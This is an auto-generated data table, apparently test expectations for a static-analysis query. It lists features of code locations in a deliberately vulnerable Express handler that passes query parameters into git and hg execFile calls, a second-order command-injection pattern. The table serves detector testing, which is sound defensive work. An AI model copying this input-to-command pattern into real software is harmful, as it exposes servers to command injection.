fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:14 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:14 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:14 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:14 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:14 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote ... .remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote ... .remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote ... .remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote ... .remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:9:6:33 | remote ... .remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:20 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:20 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:20 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:26 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:26 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:26 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:26 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:26 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:33 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:33 | req.query.remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:33 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:33 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:18:6:33 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:22:6:26 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:22:6:26 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:22:6:26 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:22:6:26 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:22:6:26 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:28:6:33 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:28:6:33 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:28:6:33 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:28:6:33 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:6:28:6:33 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | exceptional return of execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | exceptional return of execFil ... emote]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | exceptional return of execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | exceptional return of execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | exceptional return of execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:3:7:40 | execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:12:7:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:19:7:39 | ["ls-re ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:20:7:30 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | exceptional return of execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | exceptional return of execFil ... emote]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | exceptional return of execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | exceptional return of execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | exceptional return of execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:3:9:36 | execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:12:9:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:19:9:35 | ["fetch", remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | contextFunctionInterfaces | 